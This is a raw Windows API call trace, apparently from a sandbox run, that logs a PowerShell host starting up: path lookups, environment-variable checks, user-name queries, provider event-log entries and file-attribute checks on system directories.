	[0615.261] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0615.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.261] CoTaskMemFree (pv=0x2a8450) 
	[0615.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.079] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0616.079] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0616.080] CoTaskMemFree (pv=0x1b3e9f30) 
	[0616.080] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0616.080] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0616.080] CoTaskMemFree (pv=0x23c760) 
	[0616.081] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4dbf0*="Registry", lpRawData=0x2f4d980) returned 1
	[0616.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.594] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0616.594] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0616.595] CoTaskMemFree (pv=0x1b3e9f30) 
	[0616.595] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0616.595] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0616.595] CoTaskMemFree (pv=0x23c760) 
	[0616.596] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f53008*="Variable", lpRawData=0x2f52d98) returned 1
	[0616.598] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0616.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.598] CoTaskMemFree (pv=0x2a8450) 
	[0616.601] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0616.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.602] CoTaskMemFree (pv=0x2a8450) 
	[0616.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0616.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0616.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0616.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0617.174] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0617.174] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0617.175] CoTaskMemFree (pv=0x1b3e9f30) 
	[0617.175] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0617.175] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0617.175] CoTaskMemFree (pv=0x23c760) 
	[0617.176] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f66c20*="Certificate", lpRawData=0x2f669b0) returned 1
	[0617.905] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0617.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.905] CoTaskMemFree (pv=0x2a8450) 
	[0617.908] GetLogicalDrives () returned 0x4
	[0617.908] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0617.908] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0617.909] CoTaskMemAlloc (cb=0x20e) returned 0x2b30b0
	[0617.909] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2b30b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0617.910] CoTaskMemFree (pv=0x2b30b0) 
	[0617.911] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0617.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.911] CoTaskMemFree (pv=0x2a8450) 
	[0617.911] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0617.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.915] CoTaskMemFree (pv=0x2a8450) 
	[0618.671] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0618.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.671] CoTaskMemFree (pv=0x2a8450) 
	[0618.672] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0618.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.672] CoTaskMemFree (pv=0x2a8450) 
	[0618.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.673] SetErrorMode (uMode=0x1) returned 0x1
	[0618.673] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcce90 | out: lpFileInformation=0xcce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.673] SetErrorMode (uMode=0x1) returned 0x1
	[0618.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.673] SetErrorMode (uMode=0x1) returned 0x1
	[0618.673] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcce90 | out: lpFileInformation=0xcce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.673] SetErrorMode (uMode=0x1) returned 0x1
	[0618.673] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0618.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.674] CoTaskMemFree (pv=0x2a8450) 
	[0618.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.679] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0618.679] SetErrorMode (uMode=0x1) returned 0x1
	[0618.679] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0618.679] SetErrorMode (uMode=0x1) returned 0x1
	[0618.680] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0618.680] SetErrorMode (uMode=0x1) returned 0x1
	[0618.680] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0618.680] SetErrorMode (uMode=0x1) returned 0x1
	[0618.680] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0618.680] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0618.680] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.680] SetErrorMode (uMode=0x1) returned 0x1
	[0618.680] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0618.680] SetErrorMode (uMode=0x1) returned 0x1
	[0618.680] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.681] SetErrorMode (uMode=0x1) returned 0x1
	[0618.681] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0618.681] SetErrorMode (uMode=0x1) returned 0x1
	[0618.681] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.681] SetErrorMode (uMode=0x1) returned 0x1
	[0618.681] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.681] SetErrorMode (uMode=0x1) returned 0x1
	[0618.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.681] SetErrorMode (uMode=0x1) returned 0x1
	[0618.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.682] SetErrorMode (uMode=0x1) returned 0x1
	[0618.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.682] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.682] SetErrorMode (uMode=0x1) returned 0x1
	[0618.682] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcce90 | out: lpFileInformation=0xcce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0618.682] SetErrorMode (uMode=0x1) returned 0x1
	[0618.682] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.683] SetErrorMode (uMode=0x1) returned 0x1
	[0618.683] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcce90 | out: lpFileInformation=0xcce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0618.683] SetErrorMode (uMode=0x1) returned 0x1
	[0618.683] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0618.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.683] SetErrorMode (uMode=0x1) returned 0x1
	[0618.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcce90 | out: lpFileInformation=0xcce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.683] SetErrorMode (uMode=0x1) returned 0x1
	[0618.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.684] SetErrorMode (uMode=0x1) returned 0x1
	[0618.684] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcce90 | out: lpFileInformation=0xcce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.684] SetErrorMode (uMode=0x1) returned 0x1
	[0618.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0618.687] SetErrorMode (uMode=0x1) returned 0x1
	[0618.687] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0618.687] SetErrorMode (uMode=0x1) returned 0x1
	[0618.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0618.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0618.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0618.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0619.426] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0619.426] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd4b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd4b8) returned 0x1
	[0620.245] CoTaskMemFree (pv=0x1b3e9f30) 
	[0620.245] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0620.245] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd4f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4f8) returned 1
	[0620.246] CoTaskMemFree (pv=0x23c760) 
	[0620.247] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f9f908*="Available", lpRawData=0x2f9f698) returned 1
	[0620.291] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0620.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.291] CoTaskMemFree (pv=0x2a8450) 
